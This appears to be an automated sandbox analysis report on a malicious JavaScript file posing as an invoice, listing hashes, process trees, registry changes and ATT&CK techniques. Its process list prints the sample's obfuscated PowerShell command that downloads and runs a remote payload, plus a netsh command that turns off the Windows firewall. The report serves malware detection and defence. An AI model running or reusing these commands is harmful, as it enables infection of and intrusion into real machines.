Analysis
-
max time kernel
126s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20231127-en -
resource tags
arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system -
submitted
01-12-2023 09:17
Static task
static1
Behavioral task
behavioral1
Sample
invoice 2566246817.js
Resource
win7-20231023-en
Behavioral task
behavioral2
Sample
invoice 2566246817.js
Resource
win10v2004-20231127-en
General
-
Target
invoice 2566246817.js
-
Size
106KB
-
MD5
fc6d7a11059fee2eda2bab5e4c82c839
-
SHA1
9907895c521bddd02573ca5e361490f017932dbe
-
SHA256
39afb67d0916e6761f7604cb65ebdb1c115f24e62d9b122c0137b46215a0b00c
-
SHA512
1e820c22e9cbd0f360b7187eb8062089ead22cfd1a62e0e47450523659b841bf37278ddfd530c4792529d88145ceb1ff88389d541fda9e68d9c127ba5579fb39
-
SSDEEP
384:boJdyttnpXrov4gPyjjF/9sui+1VaEEEfEfffEfEffESxyOVYZPjcrdRoDT/8W8z:kS5W
Malware Config
Signatures
-
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 9 3264 powershell.exe 15 3264 powershell.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000\Control Panel\International\Geo\Nation wscript.exe -
Registers COM server for autorun 1 TTPs 2 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe Key created \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Deefenasdensossl1 = "schtasks /run /tn Deefenasdensossl1" powershell.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 36 api.ipify.org 37 api.ipify.org -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exedescription pid process target process PID 3264 set thread context of 1920 3264 powershell.exe RegSvcs.exe PID 3264 set thread context of 5044 3264 powershell.exe RegSvcs.exe PID 3264 set thread context of 4644 3264 powershell.exe Msbuild.exe -
Drops file in Windows directory 1 IoCs
Processes:
dw20.exedescription ioc process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp dw20.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
dw20.exedw20.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
dw20.exedw20.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe -
Modifies registry class 3 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe Key created \REGISTRY\USER\S-1-5-21-1067295379-1486014338-1703171060-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} powershell.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exeRegSvcs.exepid process 3264 powershell.exe 3264 powershell.exe 3264 powershell.exe 3264 powershell.exe 3264 powershell.exe 3264 powershell.exe 3264 powershell.exe 1920 RegSvcs.exe 1920 RegSvcs.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exedw20.exedw20.exedescription pid process Token: SeDebugPrivilege 3264 powershell.exe Token: SeIncreaseQuotaPrivilege 3264 powershell.exe Token: SeSecurityPrivilege 3264 powershell.exe Token: SeTakeOwnershipPrivilege 3264 powershell.exe Token: SeLoadDriverPrivilege 3264 powershell.exe Token: SeSystemProfilePrivilege 3264 powershell.exe Token: SeSystemtimePrivilege 3264 powershell.exe Token: SeProfSingleProcessPrivilege 3264 powershell.exe Token: SeIncBasePriorityPrivilege 3264 powershell.exe Token: SeCreatePagefilePrivilege 3264 powershell.exe Token: SeBackupPrivilege 3264 powershell.exe Token: SeRestorePrivilege 3264 powershell.exe Token: SeShutdownPrivilege 3264 powershell.exe Token: SeDebugPrivilege 3264 powershell.exe Token: SeSystemEnvironmentPrivilege 3264 powershell.exe Token: SeRemoteShutdownPrivilege 3264 powershell.exe Token: SeUndockPrivilege 3264 powershell.exe Token: SeManageVolumePrivilege 3264 powershell.exe Token: 33 3264 powershell.exe Token: 34 3264 powershell.exe Token: 35 3264 powershell.exe Token: 36 3264 powershell.exe Token: SeRestorePrivilege 1584 dw20.exe Token: SeBackupPrivilege 1584 dw20.exe Token: SeRestorePrivilege 2680 dw20.exe Token: SeBackupPrivilege 2680 dw20.exe Token: SeBackupPrivilege 1584 dw20.exe Token: SeBackupPrivilege 2680 dw20.exe Token: SeBackupPrivilege 2680 dw20.exe Token: SeBackupPrivilege 2680 dw20.exe Token: SeBackupPrivilege 1584 dw20.exe Token: SeBackupPrivilege 1584 dw20.exe Token: SeIncreaseQuotaPrivilege 3264 powershell.exe Token: SeSecurityPrivilege 3264 powershell.exe Token: SeTakeOwnershipPrivilege 3264 powershell.exe Token: SeLoadDriverPrivilege 3264 powershell.exe Token: SeSystemProfilePrivilege 3264 powershell.exe Token: SeSystemtimePrivilege 3264 powershell.exe Token: SeProfSingleProcessPrivilege 3264 powershell.exe Token: SeIncBasePriorityPrivilege 3264 powershell.exe Token: SeCreatePagefilePrivilege 3264 powershell.exe Token: SeBackupPrivilege 3264 powershell.exe Token: SeRestorePrivilege 3264 powershell.exe Token: SeShutdownPrivilege 3264 powershell.exe Token: SeDebugPrivilege 3264 powershell.exe Token: SeSystemEnvironmentPrivilege 3264 powershell.exe Token: SeRemoteShutdownPrivilege 3264 powershell.exe Token: SeUndockPrivilege 3264 powershell.exe Token: SeManageVolumePrivilege 3264 powershell.exe Token: 33 3264 powershell.exe Token: 34 3264 powershell.exe Token: 35 3264 powershell.exe Token: 36 3264 powershell.exe Token: SeIncreaseQuotaPrivilege 3264 powershell.exe Token: SeSecurityPrivilege 3264 powershell.exe Token: SeTakeOwnershipPrivilege 3264 powershell.exe Token: SeLoadDriverPrivilege 3264 powershell.exe Token: SeSystemProfilePrivilege 3264 powershell.exe Token: SeSystemtimePrivilege 3264 powershell.exe Token: SeProfSingleProcessPrivilege 3264 powershell.exe Token: SeIncBasePriorityPrivilege 3264 powershell.exe Token: SeCreatePagefilePrivilege 3264 powershell.exe Token: SeBackupPrivilege 3264 powershell.exe Token: SeRestorePrivilege 3264 powershell.exe -
Suspicious use of WriteProcessMemory 38 IoCs
Processes:
wscript.exepowershell.execsc.exeMsbuild.exeRegSvcs.exedescription pid process target process PID 444 wrote to memory of 3264 444 wscript.exe powershell.exe PID 444 wrote to memory of 3264 444 wscript.exe powershell.exe PID 3264 wrote to memory of 2932 3264 powershell.exe csc.exe PID 3264 wrote to memory of 2932 3264 powershell.exe csc.exe PID 2932 wrote to memory of 1832 2932 csc.exe cvtres.exe PID 2932 wrote to memory of 1832 2932 csc.exe cvtres.exe PID 3264 wrote to memory of 3464 3264 powershell.exe netsh.exe PID 3264 wrote to memory of 3464 3264 powershell.exe netsh.exe PID 3264 wrote to memory of 1920 3264 powershell.exe RegSvcs.exe PID 3264 wrote to memory of 1920 3264 powershell.exe RegSvcs.exe PID 3264 wrote to memory of 1920 3264 powershell.exe RegSvcs.exe PID 3264 wrote to memory of 1920 3264 powershell.exe RegSvcs.exe PID 3264 wrote to memory of 1920 3264 powershell.exe RegSvcs.exe PID 3264 wrote to memory of 1920 3264 powershell.exe RegSvcs.exe PID 3264 wrote to memory of 1920 3264 powershell.exe RegSvcs.exe PID 3264 wrote to memory of 1920 3264 powershell.exe RegSvcs.exe PID 3264 wrote to memory of 5044 3264 powershell.exe RegSvcs.exe PID 3264 wrote to memory of 5044 3264 powershell.exe RegSvcs.exe PID 3264 wrote to memory of 5044 3264 powershell.exe RegSvcs.exe PID 3264 wrote to memory of 5044 3264 powershell.exe RegSvcs.exe PID 3264 wrote to memory of 5044 3264 powershell.exe RegSvcs.exe PID 3264 wrote to memory of 5044 3264 powershell.exe RegSvcs.exe PID 3264 wrote to memory of 5044 3264 powershell.exe RegSvcs.exe PID 3264 wrote to memory of 5044 3264 powershell.exe RegSvcs.exe PID 3264 wrote to memory of 4644 3264 powershell.exe Msbuild.exe PID 3264 wrote to memory of 4644 3264 powershell.exe Msbuild.exe PID 3264 wrote to memory of 4644 3264 powershell.exe Msbuild.exe PID 3264 wrote to memory of 4644 3264 powershell.exe Msbuild.exe PID 3264 wrote to memory of 4644 3264 powershell.exe Msbuild.exe PID 3264 wrote to memory of 4644 3264 powershell.exe Msbuild.exe PID 3264 wrote to memory of 4644 3264 powershell.exe Msbuild.exe PID 3264 wrote to memory of 4644 3264 powershell.exe Msbuild.exe PID 4644 wrote to memory of 1584 4644 Msbuild.exe dw20.exe PID 4644 wrote to memory of 1584 4644 Msbuild.exe dw20.exe PID 4644 wrote to memory of 1584 4644 Msbuild.exe dw20.exe PID 5044 wrote to memory of 2680 5044 RegSvcs.exe dw20.exe PID 5044 wrote to memory of 2680 5044 RegSvcs.exe dw20.exe PID 5044 wrote to memory of 2680 5044 RegSvcs.exe dw20.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\invoice 2566246817.js"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c $((irm hotelofficeewn.blogspot.com////////////////////////////////////atom.xml) | .('{1}{0}'-f'kasokdaoskdoaksodkasodkaoskdoaksdoaksod','I').replace('kasokdaoskdoaksodkasodkaoskdoaksdoaksod','ex'))2⤵
- UAC bypass
- Blocklisted process makes network request
- Registers COM server for autorun
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3264 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mixyktev\mixyktev.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB91E.tmp" "c:\Users\Admin\AppData\Local\Temp\mixyktev\CSCE933ADABE69543CF92F0E4F6AA34CC2.TMP"4⤵PID:1832
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue3⤵
- Modifies Windows Firewall
PID:3464 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1920 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:5044 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7804⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:2680 -
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4644 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7804⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1584
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD566abf638c5ccd0047a1314d5d5ab780d
SHA1fbd19a1592b3128d46f72b062f2271ba0124db45
SHA25675b699fb3022c7a8f60d0796d38e1e2441b7b290a6179d0abc03f883290c200b
SHA51220d0ac09424150f532be770e1d4295cd208d1f9087b20a3942d881737b02a68af8d27e35c4cb8017acd3f9021d698682f602cc671cd2ea26debc754f76a6ab83
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5da689ab71c463204626c96d640fdd04f
SHA1e6d7c707aa8c7b8ff6d9a77d3b65b1fad1d0f550
SHA256c7b75985e44ffca76c0a3a1247b2569e476af0ce5cca114318283229730972aa
SHA5120536c184b239c88fdb1422e3409edbc1cd81d9739f98bf4d33a56e0b494c4504286b67c56d7be76af577d5b4471a582108c86eaeb0e30329db3631f63ae19c87
-
Filesize
652B
MD5417065c8c5b1106de9c84336bb6b03ec
SHA185a6c30a9ceb62c249e6f3fbfa61e4b37e362343
SHA256ece8dffe480f09704ad8e54c9ae69f9d14443d1473d782051417a8cff86870fe
SHA5127246308b0b73474db7f7251f62630aef158b29c155db1f292c512bee8565cebb9a0a384d521533d1bcf25dc322af6e6f40dfd4f51916682f125df87f54272d08
-
Filesize
870B
MD5e06ebf853695db38aaac82c9af297ae4
SHA1ef98bacec5ac2ae3bf24aac8ed56935a25c1f064
SHA25679c1099bad1dccb1d151887071b8e8b5d679de343903895fa28e45b791cae344
SHA512036449d932066d506a6bd7c08df311bf1ed5e7b3595004941fe1c39a8e9f9b0d08d43b33a180d4851f88d49c98a17b05cf5235858ada611306fc602cfd582759
-
Filesize
369B
MD59bf3a3b86fcaca993083bdb0bab8af5d
SHA148b4a62becb3e697ce521bef74899a592ed6941d
SHA256fbde79f5aa06ac3ac12e7393d7dfded6300fde0239306868f2dfd98af8628193
SHA512a0bf940ee8ee8f591167b1ffdf5b8cb2f387be8b1f3a152a5e0f69c9beee52094127203db99d473a4c47090dca4f7bd4ca42ee66f37d018b31fcc1162699d5c1